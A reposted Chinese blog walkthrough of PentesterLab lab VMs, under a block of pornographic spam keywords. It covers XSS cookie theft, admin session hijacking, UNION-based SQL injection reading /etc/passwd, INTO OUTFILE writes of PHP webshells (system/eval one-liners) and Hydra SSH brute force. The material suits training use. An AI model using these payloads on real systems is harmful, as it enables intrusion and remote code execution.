日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程语言 > php >内容正文

php

php %3c php 攻击,web 攻击靶机解题过程

發布時間:2025/4/5 php 19 豆豆
生活随笔 收集整理的這篇文章主要介紹了 php %3c php 攻击,web 攻击靶机解题过程 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

sql注入靶機攻擊過程請參考

https://pentesterlab.com/exercises/from_sqli_to_shell/course

http://www.sohu.com/a/126855490_472906

xss靶機的攻擊過程請參考

https://pentesterlab.com/exercises/xss_and_mysql_file/course

在192.168.179.129機器上打開網頁:

是個博客系統。

每個博客標題下面可以評價:

測試下是否存在xss漏洞。

發現提交后有彈出框:

進一步構造內容

同時在192.168.179.142機器上用nc打開80端口。

在原來機器上登陸admin賬戶,密碼是p4ssw0rd

登陸進去后查看剛才發布的評論話題。

接著在142這臺機器查看nc的返回內容。

獲取到cookie信息。

復制下cookie,在142機器上打開評論所在的網頁。并修改cookie的值為剛才復制的值。

刷新下頁面,發現已經已admin的身份登錄進頁面中。

進入管理界面后,發現博客編輯界面存在sql注入漏洞。

http://192.168.179.133/admin/edit.php ?id=4 union select 1,2,3,4

發現2和3可以顯示出來。

http://192.168.179.133/admin/edit.php ?id=0 union select 1,2,load_file("/etc/passwd"),4

可以讀取passwd文件,但是不能讀取shadow文件。我們嘗試能不能創建一個文件。

在編輯頁面發現錯誤提示中有/var/www/classes 目錄,

在查看源碼時發現有css目錄

嘗試后發現/var/www/css 目錄可寫。

于是構造語句:

http://192.168.179.130/admin/edit.php?id=2%20union%20select%201,2,3,4%20into%20outfile%20%22/var/www/css/s.php%22

然后打開

http://192.168.179.130/css/s.php

顯示:

說明s.php文件成功寫入到/var/www/css 目錄,下面將

寫入z.php中,構造url為:

http://192.168.179.130/admin/edit.php?id=2%20union%20select%201,2,%22%3C?php%20system($_GET[%27c%27]);%20?%3E%22,4%20into%20outfile%20%22/var/www/css/z.php%22

訪問z.php,并使用uname -a獲取系統信息。可以遠程執行命令。

下面寫入一句話木馬,構造url:

http://192.168.179.130/admin/edit.php?id=2%20union%20select%201,2,%22%3C?php%20@eval($_POST[%27chopper%27]);?%3E%22,4%20into%20outfile%20%22/var/www/css/dao.php%22

菜刀鏈接:

之前發現機器開了ssh,因此用hydra爆破下:

ssh登陸

總結

以上是生活随笔為你收集整理的php %3c php 攻击,web 攻击靶机解题过程的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。